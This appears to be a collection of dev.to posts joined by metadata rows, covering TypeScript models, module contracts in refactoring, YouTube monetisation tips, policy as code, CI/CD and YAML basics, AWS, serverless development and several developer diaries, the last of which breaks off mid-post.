}
/**
* Get database connection
*/
public getConnection(): Connection {
return this.getStaticProperty("connection");
}
/**
* Get database instance
*/
public getDatabase(): Database {
return this.getConnection().database;
}
/**
* Get Collection Query
*/
public getQuery(): Collection {
return this.getStaticProperty("query");
}
/**
* Get Static Property
*/
protected getStaticProperty<T>(property: keyof typeof Model): T {
return (this.constructor as any)[property];
}
}
```
Let's give it a try
```ts
import User from 'app/users/models/user';
// get the collection query
const user = new User;
// get the collection name
user.getCollectionName();
// get the database connection
user.getConnection();
// get the database instance
user.getDatabase();
// get the collection query
user.getQuery();
```
We can split it into 4 parts:
- Public Static Variables/Properties: to define the collection name and the connection.
- Public Static Methods: to define the collection query.
- Public Methods: to get the collection name, connection, database and collection query.
- Protected Methods: to get the static property of the child class.
The protected method is intended to not be used outside the model or one of its children as its an internal operation.
## 🎨 Conclusion
We've learned couple of good things here today, how and why to use static and non static methods, how to access static properties from a child class in the parent class, and how to use the `this.constructor` feature.
Then we created base model that allows us to get the collection query of the current model's collection name.
Then we added another feature to access the collection query or any other static methods when we create a new instance of the model.
## 🎨 Project Repository
You can find the latest updates of this project on [Github](https://github.com/hassanzohdy/nodejs-2023)
## 😍 Join our community
Join our community on [Discord](https://discord.gg/pb2vmdfhGf) to get help and support (Node Js 2023 Channel).
## 🎞️ Video Course (Arabic Voice)
If you want to learn this course in video format, you can find it on [Youtube](https://www.youtube.com/playlist?list=PLGO8ntvxgiZMJc7RN2lIq9WmMOlWZGzmz), the course is in Arabic language.
## 💰 Bonus Content 💰
You may have a look at these articles, it will definitely boost your knowledge and productivity.
General Topics
- [Event Driven Architecture: A Practical Guide in Javascript](https://dev.to/hassanzohdy/event-driven-architecture-the-best-paradigm-that-i-love-to-work-with-in-javascript-and-node-js-1gnk)
- [Best Practices For Case Styles: Camel, Pascal, Snake, and Kebab Case In Node And Javascript](https://dev.to/hassanzohdy/best-practices-for-case-styles-camel-pascal-snake-and-kebab-case-in-node-and-javascript-55oi)
- [After 6 years of practicing MongoDB, Here are my thoughts on MongoDB vs MySQL
](https://dev.to/hassanzohdy/after-6-years-of-practicing-mongodb-here-are-my-thoughts-on-mongodb-vs-mysql-574b)
Packages & Libraries
- [Collections: Your ultimate Javascript Arrays Manager](https://dev.to/hassanzohdy/collections-your-ultimate-javascript-array-handler-3o15)
- [Supportive Is: an elegant utility to check types of values in JavaScript](https://dev.to/hassanzohdy/supportive-is-an-elegant-utility-to-check-types-of-values-in-javascript-1b3e)
- [Localization: An agnostic i18n package to manage localization in your project](https://dev.to/hassanzohdy/mongez-localization-the-simplest-way-to-translate-your-website-regardless-your-favorite-framework-4gi3)
React Js Packages
- [useFetcher: easiest way to fetch data in React Js](https://dev.to/hassanzohdy/usefetcher-the-easiest-way-to-fetch-data-in-react-45o9)
Courses (Articles)
- [React Js: Let"s Create File Manager With React Js and Node Js](https://dev.to/hassanzohdy/lets-create-a-file-manager-from-scratch-with-react-and-typescript-chapter-i-a-good-way-to-expand-your-experience-5g4k)
| hassanzohdy |
1,241,566 | Refactoring Tools: Module Contracts for Lower Coupling | Let's continue our series of short posts about code refactoring! In it, we discuss technics and tools... | 20,198 | 2022-11-03T12:00:16 | https://dev.to/bespoyasov/refactoring-tools-module-contracts-for-lower-coupling-2153 | refactorit, typescript, architecture, javascript | Let's continue our series of short posts about code refactoring! In it, we discuss technics and tools that can help you improve your code and projects.
Today we will talk about how to set clear boundaries between modules and limit the scope of changes when refactoring code.
## Ripple Effect Problem
One of the most annoying problems in refactoring is the ripple effect problem. It's a situation when changes in one module “leak” into other (sometimes far distant) parts of the code base.
When the spread of changes isn't limited, we become “afraid” of modifying the code. It feels like “everything's gonna blow up” or “we're gonna need to update a lot of code”.
Most often the ripple effect problem arises when modules know too much about each other.
## High Coupling
The degree to which one module knows about the structure of other modules is called [coupling](<https://en.wikipedia.org/wiki/Coupling_(computer_programming)>).
When the coupling between modules is high, it means that they rely on the internal structure and implementation details of each other.
That is exactly what causes the ripple effect. The higher the coupling, the harder it is to make changes in isolation to a particular module.
Take a look at the example. Let's say we develop a blogging platform and there's a function that creates a new post for the current user:
```ts
import { api } from 'network'
async function createPost(content) {
// ...
const result = await api.post(
api.baseUrl + api.posts.create,
{ body: content });
// ...
}
```
The problem with this code lies in the `network` module:
- It exposes too many of its internal details to other modules to use.
- It doesn't provide the other modules with the clear public API that would guide them in how to use the `network` module.
We can fix that if we make the boundaries between the modules clearer and narrower.
## Unclear and Wide Boundaries
As we said earlier the root cause of the ripple effect is coupling. The higher the coupling, the wider the changes spread.
In the example above, we can count how tightly the `createPost` function is coupled with the `network` module:
```ts
import { api } from 'network' /* (1) */
async function createPost(content) {
// ...
const result = await api.post( /* (2) */
/* (3) */ api.baseUrl + api.posts.create, /* (4) */
/* (5) */ { body: content });
// ...
}
/**
* 1. The “entry point” to the `network` module.
* 2. Using the `post` method of the `api` object.
* 3. Using the `baseUrl` property...
* 4. ...And the `.posts.create` property to build a URL.
* 5. Passing the post content as the value for the `body` key.
*/
```
This number of points (5) is way too many. Any change in the `api` object details will immediately affect the `createPost` function.
If we assume that there are many other places where the `api` object is used, all those modules will be affected too.
The boundary between `createPost` and `network` is wide and unclear. The `network` module doesn't declare a clear set of functions for consumers (like `createPost`) to use.
We can fix this using contracts.
## API Contracts
A contract is a guarantee of one entity over others. It specifies how the modules _can_ be used and how they _can't_.
Contracts allow other parts of the program to rely not on the module's implementation but only on _its “promises”_ and to base the work on those “promises.”
In TypeScript, we can declare contracts using types and interfaces. Let's use them to set a contract for the `network` module:
```ts
type ApiResponse = {
state: "OK" | "ERROR";
};
interface ApiClient {
createPost(post: Post): Promise<ApiResponse>;
}
```
Then, let's implement this contract inside the `network` module, only exposing the public API (the contract promises) and not revealing any extra details:
```ts
const client: ApiClient = {
createPost: async (post) => {
const result = await api.post(
api.baseUrl + api.posts.create,
{ body: post })
return result
}
};
```
We concealed all the implementation details behind the `ApiClient` interface and exposed _only_ the methods that are really needed for the consumers.
> By the way, it can remind you about the [“Facade” pattern](https://refactoring.guru/design-patterns/facade) or [“Anti-Corruption Layer” technic](https://learn.microsoft.com/en-us/azure/architecture/patterns/anti-corruption-layer).
After this change, we'd use the `network` module in the `createPost` function like this:
```ts
import { client } from 'network'
async function createPost(post) {
// ...
const result = await client.createPost(post);
// ...
}
```
The number of coupling points decreased now to only 2:
```ts
import { client } from 'network' /* (1) */
async function createPost(post) {
// ...
const result = await client.createPost(post); /* (2) */
// ...
}
```
We don't rely on how the `client` _works under the hood_, only on how it _promises us to work_.
It allows us to change the internal structure of the `network` module how we want. Because while the contract (the `ApiClient` interface) stays the same the consumers don't need to update their code.
> By the way, contracts aren't necessarily a type signature or an interface. They can be sound or written agreements, DTOs, message formats, etc. The important thing is that these agreements should declare and fixate the behavior of parts of the system toward each other.
It also allows to split the code base into distinct cohesive parts that are connected with narrow and clearly specified contracts:

This, in turn, lets us limit the spread of changes when refactoring the code because they will be scoped inside the module:

## More About Refactoring in My Book
In this post, we only discussed the coupling and module boundaries.
We haven't mentioned the other significant part of this topic, which is cohesion. We skipped the formal definition of a contract and haven't discussed the Separation of Concerns principle, which can help us to see the places where to draw these boundaries.
If you want to know more about these aspects and refactoring in general, I encourage you to check out my online book:
> **[“Refactor Like a Superhero”](https://github.com/bespoyasov/refactor-like-a-superhero)**
The book is free and available on GitHub. In it, I explain the topic in more detail and with more examples.
Hope you find it helpful! Enjoy the book 🙌 | bespoyasov |
1,241,951 | Simple steps to start a $5,000/month YouTube channel - Adam_DelDuca | Original Tweet From @Adam_DelDuca Adam | YouTube ... | 0 | 2022-11-08T10:55:28 | https://infotweets.com/blog/simple-steps-to-start-a-5000month-youtube-channel-adamdelduca-fa1 | productivity, youtube, career | #### Original Tweet From [@Adam_DelDuca](https://twitter.com/Adam_DelDuca)
{% embed https://twitter.com/Adam_DelDuca/status/1585962781945495552 %}
###1|. Pick the right niche
The right niche on YouTube leads to:
- Fast growth
- High income
The wrong niche on YouTube leads to:
- Frustration
- Financial struggles
How do you pick the right niche?
Let me explain…
AdSpace Here!!
Your niche requires two elements:
1. Your interest
2. Viewer interest
When both parties are engaged, views and growth will be inevitable
Here are some in-demand niches for 2023: 
###2|. Emulate success
There are two ways to generate video ideas on YouTube:
1. Make content you think will work
2. Make content you know will work
Choosing the second option is the faster path to success
AdSpace Here!!
Let’s get into two ways to use this approach…
1|. Sort creators videos by most popular and re-create them
Add in your own personal takes
2|. Find “crack” videos where views > subscribers
Cracks are videos that outperformed the creators subscriber base
They make for great videos to emulate and here’s an example: 
###3|. Structure your videos
Your videos should have the following structure:
1. Hook
2. Intro
3. Body
4. Conclusion
Pro Tip: Transition viewers from one videos to another in the end screens to drive up session and watch time
###4|. Maximize clicks
The only way your channel will grow is by getting views
To get views, you need to maximize your clickthrough rate (CTR)
This comes from mastering titling and thumbnails
Next are a few tips that can get you more views right away…
Titles:
- Keep them short (<50 characters)
- Prompt intrigue
- Sell an outcome
Thumbnails:
- Use contrasting colors
- Complement title
Pro tip: use colors in thumbnails different than those you see on the side bar to stand out
AdSpace Here!!
###5|. Monetize efficiently
Most YouTube channels make next to no money
Why?
Because they solely rely on ad revenue
This is a mistake…
Let me share the stark difference between poor and strong monetization…
Ad revenue:
10,000 monthly views x $10 RPM = $100
Affiliate offer:
10,000 monthly views x 2% conversion x $10 commission = $2,000
Same traffic but 20x the income
Do not make this mistake on your channel…
Start building your own $5,000/mo YouTube channel
AdSpace Here!!
Get my guide Tube Ignite (25% off next 5 copies ONLY): [https://adamdelduca.gumroad.com/l/tubeignite/25off](https://adamdelduca.gumroad.com/l/tubeignite/25off)
If you enjoyed this thread, please RT the first tweet
AdSpace Here!!
Follow me for more YouTube wisdom:
[@Adam_DelDuca](https://twitter.com/Adam_DelDuca)
Click [Here](https://www.knowledge-twitter.com/?utm_source=dev.to) For More Posts Like This [https://www.knowledge-twitter.com](https://www.knowledge-twitter.com/?utm_source=dev.to) | knowledgefromtwitter |
1,242,219 | Cloud security fundamentals part 4: Align and automate with policy as code | Security policies are still awaiting digital transformation. A key phrase in today’s cloud-driven... | 0 | 2022-11-14T15:19:13 | https://snyk.io/blog/cloud-security-fundamentals-part-4/ | cloudnativesecurity, cloud, cloudsecurity, policyascode | ---
title: Cloud security fundamentals part 4: Align and automate with policy as code
published: true
date: 2022-11-03 16:25:26 UTC
tags: CloudNativeSecurity,cloud,cloudsecurity,policyascode
canonical_url: https://snyk.io/blog/cloud-security-fundamentals-part-4/
---
Security policies are still awaiting digital transformation.
A key phrase in today’s cloud-driven world, “digital transformation” generally refers to the ongoing work of digitizing formerly paper-based processes. “Paper,” however, is not literal — many processes don’t use paper, but still flow as if they were. Uploading a document to Google Drive, in other words, doesn’t amount to digital transformation.
In this sense, IT security policies still have a long way to go. In many companies, security teams codify security policies into handbooks, PDFs, and checklists, and enforce written policies manually. But manual work, reliant on human reinforcement and human follow-through, is vulnerable to mistakes.
A security policy can be strict and comprehensive on paper, but lenient and limited in practice. When error-prone processes such as these are scaled to the cloud, the risks can be immense.
It doesn’t have to be this way. By using [policy as code (PaC)](https://snyk.io/learn/policy-as-code/), companies can create and reinforce security policies that scale.
## User education is stressful and difficult to scale
A common mantra in the security industry is that “the human is always the weakest link.” With humans as a common point of vulnerability, security teams have had to work on educating end users about behaviors that will keep them and the company more secure. This education can range from simple (use strong passwords instead of weak ones) to more complex (design cloud environments without misconfigurations that open the company to attack).
Educating users, however — even technical ones — is not easy. According to [ESG research](https://www.esg-global.com/esg-issa-research-report-2018?utm_campaign=Cybersecurity%202019&utm_source=slider), 38% of cybersecurity professionals report that the most stressful part of their jobs is getting users to understand cybersecurity risks and change their behavior as a result.
This isn’t to say that users don’t care about security. Rather, it suggests that the demands of any user’s job might tempt them to take easier paths, such as writing a password on a sticky note or skimming security policy documents while building an environment. It’s less about not caring and more about bandwidth.
The gap between a priority and a preference is wide, and it reveals that manual reinforcement of security policies is neither a scalable nor sustainable strategy.
## Policy as code is objective and automatic
PaC is a scalable solution to a problem that’s already reached a massive size.
Cloud environments can often contain hundreds of thousands of resources and even vaster amounts of configurations. No one human can memorize or reinforce all of the associated security rules — especially when the environment is constantly changing. And even when a given policy is captured and recorded, the user on the other end might still ignore or misinterpret it. In addition, written policies often contain some amount of ambiguity, and cloud use cases vary considerably. So it’s often left up to engineers to figure out how policies should apply to what they’re building.
PaC leverages the programmability of the cloud by making cloud security programmable too. With PaC, security teams can express security and compliance rules in languages that applications can read and automatically validate. In cloud environments, PaC can check other code, both at the application and infrastructure levels, for non-compliant conditions.
With PaC, security teams can create a single source of truth that is clear, objective, and easy to interpret. This truth creates alignment across teams, and with that alignment comes speed (due to both automation and mutual understanding). This ensures that development teams don’t need to sacrifice speed for the sake of security or vice versa.
## Security teams as policy vendors
Security teams using PaC to create and reinforce security policies can shift their roles from enforcers to maintainers. Instead of manually writing policies and educating users on how and why to follow them, security teams can become domain experts who maintain PaC libraries, transmit best practices, and ensure follow-through.
PaC, however, is not a panacea, and security teams will benefit from keeping three things in mind as they implement it:
1. Use a PaC framework that works across the software development lifecycle (SDLC). Using different frameworks at different stages leads to disagreement and security gaps.
2. Don’t use proprietary PaC products. PaC offerings from vendors often lack the flexibility enterprises need for their specific use cases. Open source is usually the best option when implementing PaC.
3. If you don’t have access to cloud compliance experts, use pre-built libraries that compliance experts have already developed and distributed. This way, you can interpret sometimes ambiguous controls, apply the controls to your specific use case, and express them in PaC.
With these three factors in mind, PaC becomes a tool security teams can implement well.
## Only code can scale to the cloud
Scalability is the key to cloud security. The cloud is simply too complex — too large and too disparate — for manual, human effort to be effective. Only code can scale up to meet the demands of the cloud while also providing the granularity security policies need.
## Get more guidance on using policy as code
Read the full paper on the 5 Fundamentals of Cloud Security.
[Download now](https://go.snyk.io/five-fundamentals-of-cloud-security.html)
<!-- /.block --> | snyk_sec |
1,242,591 | CICD Requirements , YAML intro, Objects In YAML | Intro Hello, everyone. Welcome back in this brand-new POST will be talking a bit about... | 20,400 | 2022-11-04T03:49:37 | https://dev.to/nothanii/cicd-requirements-yaml-intro-objects-in-yaml-2j6a |
## Intro
**Hello**, everyone.
Welcome back in this brand-new POST will be talking a bit about GitHub actions, continuous integration and continuous deployment.
> Why that is important?
And
> how you can set up these basic pipelines for your project on *GitHub actions*.
Now, by the end of this course, you would not just be able to understand what** GitHub action** says and what *CICD * is.
But also would have built your few small build **pipelines ** where your project is being built tested and then deployed automatically where ever you want.
## why is CICD required

All right,
in this course, I'll be following up with a simply react playground.

I'm just going to say CICD with GitHub as the name and you can pretty much follow along on your local system.
And once you get started with the project what we'll be doing is not focus on the project that much but focusing on something known as YAML files in this little series and get of actions. Eventually, let's talk a little bit about **GitHub ** actions as well. Well, so did GitHub actions is basically a service, which allows you to do,
> continuous integration, and continuous deployment.
Now, let's actually understand
- what this exactly is.And why do we need this?
These kind of things when you see when you're building a project like you know, one on your local systems, what you are essentially doing is working in the best possible and the best comfortable way you can as a developer, right?
So you are working on all of the code and folders and everything as as a nice experience for yourself. But a lot of times, your project actually needs a build step and sometimes even a compilation step could become production-ready. That means, trimming off on the quad code, compressing the code, making the code more performant. And so on, and all of this build step in compilation. Step takes time to run. So what these *CICD *services do is in a, in a, nutshell, basically they allow
> what you have coded or written, or any member of your team has coded or it'll build and Deploy on staging production or preview environment, whatever environment you have automatically. Once you push on a repository like GitHub.
Now, this is again important because you don't want as a developer. You don't want to spend a lot of time, just building and testing everything yourself on your local system.
> Why?
Because it wastes your time and wastes the capacity of computing, you have on your system.
So you want to make sure that your deployment and testing part is as automated as possible. So that you as a developer spend, most of the time working on logic and building new features instead of actually building the project itself and testing it yourself GitHub provides this as one of the services. But GitHub is not the only place where you can run CICD. There are basically countless tools out there, which can do that, but we prefer GitHub. I prefer GitHub in this one because
> GitHub actions actually sits across your source code. Right? So when we will take a look at how we push this project together and so on I'll actually show you that basically like you know GitHub as just very convenient to push your source code to.
## Yaml Introduction

I want to talk a bit about YAML.
> what this exactly is
YAML is *not a markup language* or sometimes some people say yet, another markup language as well. But the point you have to remember, is
> YAML is pretty much what JSON is, right?
So you have seen stuff like package.json right? When you take a look inside package.json, you see there are these objects which can contain keys and values keys and values, right? Yeah, YAML is pretty much the same thing. The only difference is how YAML has written Json is used as a thing to communicate between different kind of languages and build systems and, you know, environments, right? So package.json can be read by JavaScript as well. Package.json this file, technically could also be read by a Java program or a python. Program, right? So let's say, if your Nodejs script wanted to spit out some data, which your python Market would read then. One way to do that, is to spit out that data into a Json format. Similarly, YAML is also a similar format for which you would have, you know, you would require a few libraries. For example, there is no native support for able in node.js, but it's more like a data exchange format among different you know, different languages. Different systems. Now, what YAML does better over Json is readability? Right, so we're gonna see eventually like this is, this is also quite readable, but YAML is even more cleaner. Why? Because it uses very less special characters. Like usually, there is no need of these codes. These brackets, these commas. Nothing is required by. There is very very minimal language syntax, which you need are a lot of information which needs to be go, you know, needs. To go in the file is just basically what your logic is for the data. So this little section or in this collection we're going to learn about YAML a bit, because it is really important to understand. YAML first, before you actually start writing work profiles because this is almost like a new kind of data format, which you are seeing right. Let me go ahead and get on with you who the YAML syntax a bit from the next one.

## Objects In YAML
Let's start with YAML Basics,
So we're going to cover a few important things in the YAML . The first thing is
> how you generate keys and value beard
So in YAML what you do is you say key name and there are Colin and then the value, whatever that value is right. So this is like a completely valid YAML file. Similarly, let's say if I have a service My project that I could have, you know, tests or script as script one, then test to as script 2 and so on. So what essentially we are doing here is if you want to compare it with a JavaScript based, rendering something equivalent in JavaScript YAML has much more condensed information compared to JSON
Just gets more condensed as we Nest objects and I'm as we go ahead and start working with that. So you can see right now that we just created some top-level keys and value pairs. Now it is possible in YAML to also go ahead and create nested objects, right? And the way you do that is pretty much with indentation so you can see my app as the key of A, you know, a parent object.
And for these three keys, you have I really need them now. Very important YAML ,
> just like in Python that these indentations are actually consistent with each other, right? Whether they are spaces or tabs doesn't matter, but they have to be consistent with each other. That if you are using one thing, then it has to be one thing all across your file. A similar thing.

The similar logic in Json would look something like this in my app and then an object, something like this, and yep. There we go. So these two files over here at technically equivalent
In terms of the data, they contain, right? So this is important because now you can see that it's much cleaner and much more human-readable compared to JSON.
### ***TO BE CONTINUED *** | nothanii | |
1,242,822 | why AWS is best in 2022 ? | AWS is the leading provider for cloud computing. It provides a set of services that allow users to... | 0 | 2022-11-04T07:56:05 | https://dev.to/akshat2203/why-aws-is-best-in-2022--m9 | aws, cloud, beginners, devops | AWS is the leading provider for cloud computing. It provides a set of services that allow users to store, manage, and analyze data in several geographically distributed locations.
AWS was first launched in 2006 as an alternative to Microsoft's Windows Azure. AWS has grown rapidly since then, and now serves as an important part of many businesses' IT architecture.
The main benefits of using AWS are:
* Scalability: AWS offers a large number of servers that are ready to be used by customers. This allows you to scale up or down according to your needs without having to worry about how many servers you will need at any given time.
* Flexibility: You can choose from different types of software like Linux and Windows so that you can run whatever application you want on your infrastructure without worrying about compatibility issues between different platforms.
* Cost-effectiveness: The cost per hour is much lower than other options available on the market today such as Microsoft Azure, Google Cloud Platform (GCP), and IBM Bluemix which offer similar features but at higher prices per hour basis compared with AWS pricing scheme which makes it an attractive choice for businesses who want lower costs while still retaining some flexibility in terms. | akshat2203 |
1,243,043 | Explain SQL Like I'm Five | Now, I'm curious about what exactly SQL is. I've seen it used for websites, but I never understood... | 0 | 2022-11-04T09:27:36 | https://dev.to/calum_medlock/explain-sql-like-im-five-3j86 | explainlikeimfive, sql | Now, I'm curious about what exactly SQL is. I've seen it used for websites, but I never understood its sole purpose, so… anyone happy to explain? | calum_medlock |
1,243,411 | New era: The Official Site | Finally, the fabled day has come. The genesis of a new world order. One were platforms are linked,... | 0 | 2022-11-04T14:30:44 | https://dev.to/lit_mgwebi/new-era-the-official-site-2n2d | showdev, webdev, web3, career | Finally, the fabled day has come. The genesis of a new world order. One were platforms are linked, communication is efficient and everything is connected.
I have finally completed my portfolio site. Follow the link to check it out. Please and Thank you
https://lithimgwebi.vercel.app/ | lit_mgwebi |
1,243,416 | Find out how Rapid Development with Serverless is like Lego! | Many don't understand how to use a Rapid Development approach in Serverless. Even in the broader... | 0 | 2022-11-04T14:31:56 | https://theserverlessedge.com/find-out-how-rapid-development-with-serverless-is-like-lego/ | serverless, cloud, aws, architecture | Many don't understand how to use a Rapid Development approach in Serverless. Even in the broader architecture community. Adrian Cockroft has produced excellent talks on the subject. This short six minute video is a great example of one:
{% embed https://www.youtube.com/watch?v=5siD210Grr4 %}
What is Rapid Development with Serverless? And why as an Architect is it an important to understand it compared to traditional methods?
## Serverless is like building with interoperable Lego Blocks
Adrian talks about Cloud Providers taking common industry patterns and needs, like ‘gateways’, compute, storage. And creating Managed Services that cater for the needs of teams. In AWS, your serverless gateway option would be an API Gateway. For Serverless Compute you might have Lambda. And for persistence you could have DynamoDB or Aurora.
These Managed Services are the ‘lego blocks’. Within the Cloud Provider these blocks are highly interoperable, abstract in nature (you won’t know the inner workings) and usually highly configurable to your needs. You are able to put these building blocks together for higher order functions eg. business application. You could use an API Gateway Block integrated with a Lambda Function to run logic. And you could integrate with DynamoDB for persistence.

## Get feedback quickly
Adrian is correct. A team can produce a working system within hours. Let’s examine this more deeply. The idea is that Serverless teams have a bias for action. They put lego blocks together. And put solutions in place, through rapid development.
You need to understand that a serverless ecosystem is geared towards rapid experimentation and feedback. Test and Release cycles can be short, as in literally minutes. And as there is no provisioned physical infrastructure (that the team owns). Costs are accommodating and low.
Serverless teams will favour a product mindset and be much more able to react and pivot to directional shifts from the business. Traditional cycles are not as accommodating to experimentation and rapid feedback driven approaches.
## Embracing the Enabling Constraints
Serverless provides team’s with constraints that guide their designs and how they assemble their architectures. In traditional architecture approaches there may be investment in working out interoperability and compatibility with Open Source and COTS solutions. Serverless-First and enabling constraints simply speed up the decision making process and allow for rapid development. These constraints guide the serverless architecture patterns of which there are many, that teams can adopt.
The Rapid Development Approach using Serverless provides teams with access to useable building blocks. Teams can benefit from the principles of interoperability, abstraction, optimised ops and costs.
And they can leverage it in a continuous development style workflow. This workflow will change how the industry thinks about software. And will ultimately help evolve it towards a Serverless-First industry.
## Traditional v Rapid Development

| serverlessedge |
1,243,501 | What was your win this week? | Hey folks! 👋 Hope everybody is having a fantastic Friday and that you all have wonderful... | 0 | 2022-11-04T16:16:05 | https://dev.to/devteam/what-was-your-win-this-week-5fbc | discuss, weeklyretro | Hey folks! 👋
Hope everybody is having a fantastic Friday and that you all have wonderful weekends!
Looking back on this past week, what was something you were proud of accomplishing?
All wins count — big or small 🎉
Examples of 'wins' include:
- Starting a new project
- Fixing a tricky bug
- Raking the lawn 🍂
---
Time to dive into the weekend!
 | michaeltharrington |
1,243,509 | Day 01 - 100DayOfCode Challenge | Shit!!! 👻 I recently started the #100DaysofCode challenge. Every few days I take a piece of code and... | 20,608 | 2022-11-04T16:25:00 | https://dev.to/highnitin/day01-100dayofcode-challenge | 100daysofcode, highnitin, webdev, javascript | Shit!!! 👻
I recently started the #100DaysofCode challenge. Every few days I take a piece of code and write about it to improve my programming skills and to assess my knowledge. 😀
And Jayesh, thanks for sharing your story and preaching about learning on a daily basis, and that's why I commit to #100DaysofArticleReading + #100DaysofNewsletterReading. 📑
I just read two amazing articles that I can't help but share with my connections all right away. In this post I will briefly explain what these two articles are about. 📑
Article 1 is about - 11 Amazing New JavaScript Features in ES13, which includes:
1. Class Field Declarations,
2. Private Methods and Fields
3. await Operator at the Top Level
4. Static Class Fields and Static Private Methods
5. Class Static Block
6. Ergonomic Brand Checks for Private Fields
7. at() Method for Indexing
8. RegExp Match Indices
9. Object.hasOwn() Method
10. Error Cause
11. Array Find from Last
Article 2 is about - How to design good APIs? which includes:
1. What is API?
2. API Design Goals
3. API Design in Practice
4. Side Effects
5. Handling Large Response
6. Consistency v/s Availability
So we have looked at the latest features that ECMAScript 2022 i.e. ES13 brings to JavaScript. Please use them to increase your productivity as a developer and write cleaner code with more brevity and clarity.
I want to learn and share with you folks ;) I want to get updates from you and also support your challenges daily. Any feedback is always appreciated.
Buckle up! We have a full year of coding ahead of us. See you on the next post :)
For Video explanation - https://www.youtube.com/watch?v=ri-OtBDcq44
------------------------------------------------------------------
Article Link:
1. https://medium.com/@interviewready/how-to-design-good-apis-ccd875590599
2. https://javascript.plainenglish.io/es13-javascript-features-eed7ed2f1497
------------------------------------------------------------------
Cheers,
HighNitin | highnitin |
1,243,527 | Alternative Data | Hey, Recently I visited Proxycurl and got some information about Alternative Data. There's a lot of... | 0 | 2022-11-04T17:11:46 | https://dev.to/happyhearthacker/alternative-data-14eg | data, nubela | Hey,
Recently I visited [Proxycurl](https://nubela.co/blog/the-ultimate-guide-to-alternative-data-what-is-it-really/) and got some information about Alternative Data.
There's a lot of talk these days about "big data" and the insights that can be gleaned from large data sets. But what about "alternative data"?
I blogged about that here [https://hulkhack.blogspot.com/2022/11/alternative-data.html](https://hulkhack.blogspot.com/2022/11/alternative-data.html)
Found that [ProxyCurl](https://nubela.co/proxycurl/solutions/alternative-data-for-investment-firms) is the best place for alternative data.

| happyhearthacker |
1,243,834 | Weekly 0035 | Monday Some difficult to have a good sleep, I woke very very early in the night. I tried... | 17,109 | 2022-11-06T20:00:02 | https://dev.to/kasuken/weekly-0035-5h33 | ### Monday
Some difficult to have a good sleep, I woke very very early in the night.
I tried to arrange my daily activities and my week activities.
I also created a lot of todo entries for the new course about Visual Studio Code for [Improove Academy.](https://www.improove.tech/)
Then I started to debugging Red Origin for the entire morning and beginning of afternoon and I stopped with this task a little bit before the meeting about the future of Red Origin.
We are deciding if we want to proceed with the project or not.
We will take the decision tomorrow.
By the way I have learned another new thing today: how to retrieve all the information about the scopes with the Graph API in C#.
I will write an article about, for sure.
{% embed https://twitter.com/kasuken/status/1585915393398689792?s=20&t=QdgDJnrSzranN8vnlZhUTA %}
At the end of working hours I did the Hacktoberfest!!!
{% embed https://twitter.com/kasuken/status/1587137570378579969?s=20&t=5vJxPssSxKdA-yaQoVVUGw %}
**Mood:** 🤓
### Tuesday
Spending all the day to write down tests in Microsoft Excel. Yes… not Azure DevOps but Microsoft Excel… please don’t ask.
I did and wrote down more than 100 tests.
In the late afternoon I also wrote down the strategies to give a good support level to the product.
**Mood**: 🙁
### Wednesday
The first task of the day was: add Auth0 to the new Brandplane Project. Done and dusted in 1 hour.
I will create a new template for dotnet with Auth0 just implemented. I use this logic a lot of time… and every time I spend 1-2 hours to configure everything.
Then, I started to test Red Origin with different accounts permission, just for testing buttons and permissions.
**Mood:** 😒
### Thursday
A very long day. In the morning I asked to a friend of mine to help with some architectures notice for Red Origin.
I implemented Refit ([https://www.nuget.org/packages/Refit](https://www.nuget.org/packages/Refit)) and a better way to use Entity Framework.
I have a lot of technical debts about Entity Framework. I don’t use it very often and I know that it’s one of my big flaw.
I will study it much better in the next weeks.
By the way, at the end of the day I rewritten a lot of my code from the UI to the service layers.

This is the result of the refactoring at the end of the day.
I also created a timelapse during this working activitity.
{% embed https://twitter.com/kasuken/status/1588156033746223105?s=20&t=QdgDJnrSzranN8vnlZhUTA %}
**Mood: 🤪**
### Friday
Lazy and not real productive day but at the end I have implemented two features on Red Origin. I just moved the favorites list of the Azure AD apps in a dedicated page and some minor improvements in the application.
In the late afternoon I posted an article on the blog about the Logging Level in .NET 6 projects.

[https://dev.to/kasuken/enabling-and-disabling-logs-in-aspnet-core-6-4076](https://dev.to/kasuken/enabling-and-disabling-logs-in-aspnet-core-6-4076)
**Mood: 😒**
---
Thanks for reading this post, I hope you found it interesting!
Feel free to follow me to get notified when new articles are out 🙂
{% embed https://dev.to/kasuken %}
| kasuken | |
1,243,859 | This Week in DevRel: Life Moves Fast | This post is more of a DevRel, Technical Community Builder highlight reel; I plan on writing a reflection on how I plan on building time into looking around more than once in a while later in the month. | 19,583 | 2022-11-04T22:29:50 | https://dev.to/bekahhw/this-week-in-devrel-life-moves-fast-5gfc | devrel, codenewbie, career | ---
title: This Week in DevRel: Life Moves Fast
published: true
description: This post is more of a DevRel, Technical Community Builder highlight reel; I plan on writing a reflection on how I plan on building time into looking around more than once in a while later in the month.
tags: devrel, codenewbie, career
series: Technical Community Building
# cover_image: https://direct_url_to_image.jpg
# Use a ratio of 100:42 for best results.
# published_at: 2022-11-04 22:26 +0000
---
Well, my "This Week in DevRel" series has turned into this “couple of months” in DevRel. In the words of Ferris Bueller, “Life moves pretty fast. If you don't stop and look around once in a while, you could miss it.” And I feel like a lot of the last two months, I’ve been moving fast and not taking the time to look around. I’m working on it. This post is more of a highlight reel; I plan on writing a reflection on how I plan on building time into looking around more than once in a while later in the month.
## Highlights
### Conferences
I was lucky enough to have the opportunity to give my talk [Does your Org Need a Community](https://www.youtube.com/watch?v=zoo0B7GFvo8) at [MagnoliaJS](https://www.magnoliajs.com/) this year and to attend [Momentum Conf](https://momentumdevcon.com/).
I did a lot of learning at these conferences. Some of it was when I was listening to talks, including one on community and one on burnout. Some of it was talking to other people in the field. I gravitate towards people who are doing some type of community building, whether or not that’s in their job description. Having this conversations helps me to get a pulse on the wider tech community, bounce ideas off of community professionals, and explore new ideas and initiatives.
### Hacktoberfest
It’s my favorite time of the year! This year I participated as a mentor, contributor, and maintainer. I got to work on my postpartum wellness app with others and launch a new Deepgram project as a maintainer that I really enjoyed working on. It’s a chrome extension that allows the user to get transcripts in a browser tab, and we’re working on functionality to have translation available as well. I plan on keeping this going as long as the ideas are flowing and folks find it helpful. If you want to check it out, here’s the [GitHub repo](https://github.com/deepgram-devs/dg-translation-chrome-ext). I also supported the [Virtual Coffee](https://virtualcoffee.io/) Hacktoberfest Initiative. If you want to read more about that, check out [Dan Ott’s post](https://dev.to/virtualcoffee/virtual-coffee-hacktoberfest-2022-roundup-1c2k).
### Livestreams
